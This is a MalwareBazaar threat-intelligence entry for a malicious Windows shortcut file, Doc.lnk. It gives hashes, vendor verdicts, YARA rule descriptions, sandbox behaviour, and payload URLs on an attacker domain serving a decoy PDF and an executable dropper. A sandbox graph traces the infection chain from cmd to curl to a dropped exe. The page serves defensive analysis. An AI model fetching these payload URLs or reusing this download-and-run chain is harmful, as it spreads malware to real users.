MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 5f8d7e2784e81a45eb4ce0f788110c4e0d84c6224a1041ae7390fd3ba8ff1883. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 13


Intelligence 13 IOCs YARA 6 File information Comments 1
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 5f8d7e2784e81a45eb4ce0f788110c4e0d84c6224a1041ae7390fd3ba8ff1883
SHA3-384 hash: b9547efa881fcc4d64b6210780889e4442c5fe83e48cf81f2ed3648ed18db70ee263341ab58650bfd4fef96d91782677
SHA1 hash: 66151352e0681a862ff32a6969c0f2ba85d47ff6
MD5 hash: 428af83aedf12392cf3c3b19c9119206
humanhash: red-johnny-table-utah
File name:Doc.lnk
Download: download sample
File size:2'940 bytes
First seen:2025-12-17 12:34:59 UTC
Last seen:Never
File type:Shortcut (lnk) lnk
MIME type:application/x-ms-shortcut
ssdeep 24:8w/kJik3P2pAApA+/Tyhq3zGdhKSkGJ8R5Oe/E4I0lVmOdrab6B:8w/mf2FMGohMU45OgIvOZae
TLSH T1E851F0246FEE8720D3714D3FECBAFB21C9B9B952E9A2CF6D0560404C1852940B835F2B
Magika lnk
Reporter smica83
Tags:lnk UKR

Intelligence

File Origin
# of uploads :
1
# of downloads :
75
Origin country :
HU HU
Vendor Threat Intelligence
Malware configuration found for:
LNK
Details
LNK
a command line and any observed urls
Link:
https://research.acce.ciphertechsolutions.com/results/45f84a4f-d161-43bb-8596-02c0e62858db/
Detection(s):
Sanesecurity.Malware.27118.LnkHeur.UNOFFICIAL
Create hunting rule

Sanesecurity.Malware.26472.PshHeur.UNOFFICIAL
Create hunting rule

TwinWave.EvilLNK.CMDLineCarrotsFoundationsOfDecay.M2.20220516.UNOFFICIAL
Create hunting rule

TwinWave.EvilLNK.OddLook.202207213.UNOFFICIAL
Create hunting rule

TwinWave.EvilLNK.CMDLineCarrotsFoundationsOfDecay.M3.20221011.UNOFFICIAL
Create hunting rule

TwinWave.EvilLNK.KingForADayDownloaders.20231121.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
81.4%
Link:
https://cyber-fortress.com/docs/result/index.php?id=6942a38a4d2b81828c3b8468
Tags:
infosteal obfuscate dropper sage
Result
Verdict:
Malicious
File Type:
LNK File - Malicious
Link:
https://app.docguard.net/5f8d7e2784e81a45eb4ce0f788110c4e0d84c6224a1041ae7390fd3ba8ff1883/results/dashboard
Payload URLs
URL
File name
https://telem3try.oooppppqqq9999.com:8443/files/pp.pdf&&start
LNK File
Behaviour
BlacklistAPI detected
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
autorun cmd lolbin masquerade packed zero
Link:
https://www.filescan.io/uploads/6942a3863f8fdbf8e9495a1a/reports/54b6e0af-4582-4d22-8e1b-63a57b965a2d/overview
Verdict:
Malicious
Labled as:
Trojan.Generic
Link:
https://www.hybrid-analysis.com/sample/5f8d7e2784e81a45eb4ce0f788110c4e0d84c6224a1041ae7390fd3ba8ff1883
Verdict:
Malicious
File Type:
lnk
First seen:
2025-12-16T11:24:00Z UTC
Last seen:
2025-12-18T12:48:00Z UTC
Hits:
~10
Detections:
Trojan.WinLNK.Agent.sb HEUR:Trojan.WinLNK.Agent.gen HEUR:Trojan.Multi.GenBadur.genw
Link:
https://opentip.kaspersky.com/5f8d7e2784e81a45eb4ce0f788110c4e0d84c6224a1041ae7390fd3ba8ff1883/results?tab=lookup
Result
Threat name:
n/a
Detection:
malicious
Classification:
n/a
Score:
64 / 100
Link:
https://www.joesandbox.com/analysis/1834768
Signature
Multi AV Scanner detection for submitted file
Obfuscated command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Windows shortcut file (LNK) starts blacklisted processes
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1834768 Sample: Doc.lnk Startdate: 17/12/2025 Architecture: WINDOWS Score: 64 30 telem3try.oooppppqqq9999.com 2->30 38 Windows shortcut file (LNK) starts blacklisted processes 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Obfuscated command line found 2->42 44 Windows shortcut file (LNK) contains suspicious command line arguments 2->44 9 cmd.exe 3 2 2->9         started        signatures3 process4 process5 11 curl.exe 2 9->11         started        14 Acrobat.exe 57 9->14         started        16 curl.exe 2 9->16         started        19 2 other processes 9->19 dnsIp6 34 telem3try.oooppppqqq9999.com 194.59.31.187, 49717, 8443 COMBAHTONcombahtonGmbHDE Germany 11->34 36 127.0.0.1 unknown unknown 11->36 21 AcroCEF.exe 105 14->21         started        28 C:\Users\user\AppData\Local\Temp\t.exe, PE32+ 16->28 dropped 23 WerFault.exe 19 16 19->23         started        file7 process8 process9 25 AcroCEF.exe 3 21->25         started        dnsIp10 32 23.216.68.137 AKAMAI-ASN1EU United States 25->32
Verdict:
Malware
YARA:
2 match(es)
Tags:
Execution: CMD in LNK LNK LOLBin LOLBin:cmd.exe Malicious T1059.003 T1202: Indirect Command Execution T1204.002
Link:
https://app.malva.re/file/428af83aedf12392cf3c3b19c9119206
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/5f8d7e2784e81a45eb4ce0f788110c4e0d84c6224a1041ae7390fd3ba8ff1883/
Verdict:
Malicious
Threat:
Trojan.WinLNK.Agent
Link:
https://tip.neiki.dev/file/5f8d7e2784e81a45eb4ce0f788110c4e0d84c6224a1041ae7390fd3ba8ff1883
Threat name:
Shortcut.Trojan.Generic
Create hunting rule
Status:
Suspicious
First seen:
2025-12-16 23:32:00 UTC
File Type:
Binary
AV detection:
9 of 36 (25.00%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=l6gx4j4e5anel22m4d3yqeimjygyjrrcjiiedlttsd6txkh7dcbq._file
Result
Malware family:
n/a
Score:
  8/10
Tags:
adware discovery persistence spyware
Link:
https://tria.ge/reports/251217-psgveafm2v/
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies data under HKEY_USERS
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Drops file in Windows directory
Adds Run key to start application
Checks computer location settings
Executes dropped EXE
Downloads MZ/PE file
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/5f8d7e2784e81a45eb4ce0f788110c4e0d84c6224a1041ae7390fd3ba8ff1883

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Download_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies download artefacts in shortcut (LNK) files.
Rule name:Execution_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies execution artefacts in shortcut (LNK) files.
Rule name:LNK_Malicious_Nov1
Create hunting rule
Author:Florian Roth (Nextron Systems)
Description:Detects a suspicious LNK file
Reference:https://www.virustotal.com/en/file/ee069edc46a18698fa99b6d2204895e6a516af1a306ea986a798b178f289ecd6/analysis/
Rule name:LNK_sospechosos
Create hunting rule
Author:Germán Fernández
Description:Detecta archivos .lnk sospechosos
Rule name:PDF_in_LNK
Create hunting rule
Author:@bartblaze
Description:Identifies Adobe Acrobat artefacts in shortcut (LNK) files. A PDF document is typically used as decoy in a malicious LNK.
Rule name:SUSP_LNK_CMD
Create hunting rule
Author:SECUINFRA Falcon Team
Description:Detects the reference to cmd.exe inside an lnk file, which is suspicious

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Shortcut (lnk) lnk 5f8d7e2784e81a45eb4ce0f788110c4e0d84c6224a1041ae7390fd3ba8ff1883

(this sample)

Executable exe 3fb5e68ccbdec50f86c7f1ce71a629038a1e17ff49f79dca044f61ac0e4ae781

  
Dropping
SHA256 3fb5e68ccbdec50f86c7f1ce71a629038a1e17ff49f79dca044f61ac0e4ae781
  
Dropping
MD5 4eeec8b1b371a9f3151a578867332f70
  
Dropping
SHA256 bf724f5f19df9b2fdb0f45a79b6d9a88e8acf02843465ce891c6a4ad6c8d47a6
  
Dropping
MD5 40e380fc3f4934a5d61b2ecef29f1858

Comments


Avatar
commented on 2025-12-18 10:14:12 UTC

Payload URL:
https://telem3try.oooppppqqq9999.com:8443/files/surf3ce.exe